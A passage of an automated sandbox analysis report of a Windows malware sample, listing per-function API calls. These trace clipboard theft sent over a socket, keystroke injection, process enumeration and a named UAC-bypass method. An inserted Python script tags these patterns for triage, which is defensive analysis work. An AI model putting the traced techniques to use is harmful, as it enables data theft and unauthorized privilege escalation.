                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • __freea.LIBCMT ref: 00449B50
                                        • __freea.LIBCMT ref: 00449B75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • String ID:
                                        • API String ID: 3864826663-0
                                        • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                        • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                        • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                        • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                        APIs
                                        • SendInput.USER32 ref: 00418B18
                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                          • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InputSend$Virtual
                                        • String ID:
                                        • API String ID: 1167301434-0
                                        • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                        • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                        • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                        • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                        APIs
                                        • OpenClipboard.USER32 ref: 00415A46
                                        • EmptyClipboard.USER32 ref: 00415A54
                                        • CloseClipboard.USER32 ref: 00415A5A
                                        • OpenClipboard.USER32 ref: 00415A61
                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                        • CloseClipboard.USER32 ref: 00415A89
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                        • String ID:
                                        • API String ID: 2172192267-0
                                        • Opcode ID: d9c410470e1138b8a4c9be85fd81145319fac6db587be0b527b00daa86c960c7
                                        • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                        • Opcode Fuzzy Hash: d9c410470e1138b8a4c9be85fd81145319fac6db587be0b527b00daa86c960c7
                                        • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16
                                        • String ID: a/p$am/pm$fD
                                        • API String ID: 3509577899-1143445303
                                        • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                        • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                        • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                        • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                        APIs
                                        • _free.LIBCMT ref: 00447ECC
                                        • _free.LIBCMT ref: 00447EF0
                                        • _free.LIBCMT ref: 00448077
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                        • _free.LIBCMT ref: 00448243
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: 987cd6ff04374740ad638309c533d0c602dfd377e295f885280b4824386cdb1c
                                        • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                                        • Opcode Fuzzy Hash: 987cd6ff04374740ad638309c533d0c602dfd377e295f885280b4824386cdb1c
                                        • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                        • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                        • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                        • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                        APIs
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • _free.LIBCMT ref: 00444096
                                        • _free.LIBCMT ref: 004440AD
                                        • _free.LIBCMT ref: 004440CC
                                        • _free.LIBCMT ref: 004440E7
                                        • _free.LIBCMT ref: 004440FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$AllocateHeap
                                        • String ID: Z7D
                                        • API String ID: 3033488037-2145146825
                                        • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                        • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                        • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                        • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                        • __fassign.LIBCMT ref: 0044A190
                                        • __fassign.LIBCMT ref: 0044A1AB
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                        • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                        • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                        • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                        • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                        • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                        APIs
                                        • ExitThread.KERNEL32 ref: 004017F4
                                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                        • __Init_thread_footer.LIBCMT ref: 004017BC
                                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                        • String ID: T=G$>G$>G
                                        • API String ID: 1596592924-1617985637
                                        • Opcode ID: 7fea690cd5114764ac3b3016db8b19bc4d1365cb468e8419b76e50a1049d06b2
                                        • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                        • Opcode Fuzzy Hash: 7fea690cd5114764ac3b3016db8b19bc4d1365cb468e8419b76e50a1049d06b2
                                        • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                        APIs
                                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                          • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                        • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                          • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                          • Part of subcall function 0041B197: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1B7
                                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                        • String ID: PgF
                                        • API String ID: 2180151492-654241383
                                        • Opcode ID: d45e152db1594e52a28c92c812a6bfc09764fa0d060a7e5a38ae0a426294ee6f
                                        • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                        • Opcode Fuzzy Hash: d45e152db1594e52a28c92c812a6bfc09764fa0d060a7e5a38ae0a426294ee6f
                                        • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
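The API listings above (the clipboard routine at 00415A46 whose subcall ends in send(), the SendInput sequence at 00418B18, and the Toolhelp32 process walk at 0040E6C1 with its IsWow64Process subcall) are the raw material a triager reads off a report like this. What follows is an added example, not part of the Joe Sandbox report or its tooling: a small parser for the report's "APIs" bullets that groups them per function, decodes the few Win32 constants that appear in these listings (0xD is CF_UNICODETEXT, 0x2 is TH32CS_SNAPPROCESS, 0x400 and 0x1000 are the two OpenProcess query rights) and tags each function with a capability label. The labels, the rule table and the header-based grouping are the editor's own assumptions; the sample input is copied from the three listings named above.

```python
"""Tag each function's "APIs" listing in a Joe Sandbox report with the
capability its call pattern implies. Added example for this page, not Joe
Sandbox code; labels, constant table and grouping rule are the editor's own."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One API bullet as the report prints it; see SAMPLE below for the shapes.
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants for arguments in this report, keyed by (API, argument index).
KNOWN_CONSTANTS = {
    ("GetClipboardData", 0): {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"},
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("OpenProcess", 0): {0x400: "PROCESS_QUERY_INFORMATION",
                         0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"},
}

# A function earns a label when every API in the set appears in it (subcalls count).
CAPABILITY_RULES = {
    "clipboard_read_and_send": {"OpenClipboard", "GetClipboardData", "send"},
    "keystroke_injection": {"SendInput"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32NextW"},
    "wow64_bitness_check": {"IsWow64Process"},
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None

    def decoded_args(self) -> List[str]:
        # Name known hex constants; '?' and symbolic values pass through.
        out = []
        for i, raw in enumerate(self.args):
            table = KNOWN_CONSTANTS.get((self.name, i), {})
            try:
                out.append(table.get(int(raw, 16), raw))
            except ValueError:
                out.append(raw)
        return out

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line.strip())
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return ApiCall(m["name"], m["module"], args, m["ref"], m["sub"])

def parse_report(text: str) -> List[List[ApiCall]]:
    # An "APIs" header opens a function; its bullets run until the next
    # "Memory Dump Source" header. Every other report line is skipped.
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            functions.append(current)
        elif line == "Memory Dump Source":
            current = None
        elif current is not None and (call := parse_api_line(line)):
            current.append(call)
    return [f for f in functions if f]

def capabilities(calls: List[ApiCall]) -> List[str]:
    names = {c.name for c in calls}
    return sorted(t for t, needs in CAPABILITY_RULES.items() if needs <= names)

def summarize(text: str) -> List[dict]:
    # One entry per function: first call address, API names, capability labels.
    return [{"first_ref": f[0].ref, "apis": sorted({c.name for c in f}),
             "capabilities": capabilities(f)} for f in parse_report(text)]

# Constructed sample: three function listings copied from this report.
SAMPLE = """\
APIs
• OpenClipboard.USER32 ref: 00415A46
• GetClipboardData.USER32(0000000D), ref: 00415A71
  • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
APIs
• SendInput.USER32 ref: 00418B18
• SendInput.USER32(00000001,?,0000001C), ref: 00418B40
  • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
Memory Dump Source
APIs
  • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
Memory Dump Source
"""
```

Fed the whole "Executed Functions" section instead of SAMPLE, summarize() returns one entry per function, and the clipboard-plus-send pairing, the SendInput loop and the process walk are the three that surface for closer reversing. A rule that almost fires (a clipboard read with no send() in the listing) is the cue to check whether the sandbox simply did not print the subcall rather than to assume the data stays local.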
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                        • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                        • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                        • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                        • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                        • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                        • int.LIBCPMT ref: 0040FC0F
                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                        • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID: p[G
                                        • API String ID: 2536120697-440918510
                                        APIs
                                          • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                        • _free.LIBCMT ref: 0044FD39
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 0044FD44
                                        • _free.LIBCMT ref: 0044FD4F
                                        • _free.LIBCMT ref: 0044FDA3
                                        • _free.LIBCMT ref: 0044FDAE
                                        • _free.LIBCMT ref: 0044FDB9
                                        • _free.LIBCMT ref: 0044FDC4
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        APIs
                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe), ref: 00406835
                                          • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                          • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                        • CoUninitialize.OLE32 ref: 0040688E
                                        Strings
                                        • [+] before ShellExec, xrefs: 00406856
                                        • [+] ShellExec success, xrefs: 00406873
                                        • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                                        • C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, xrefs: 00406815, 00406818, 0040686A
                                        Similarity
                                        • API ID: InitializeObjectUninitialize_wcslen
                                        • String ID: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                        • API String ID: 3851391207-3860793818
                                        APIs
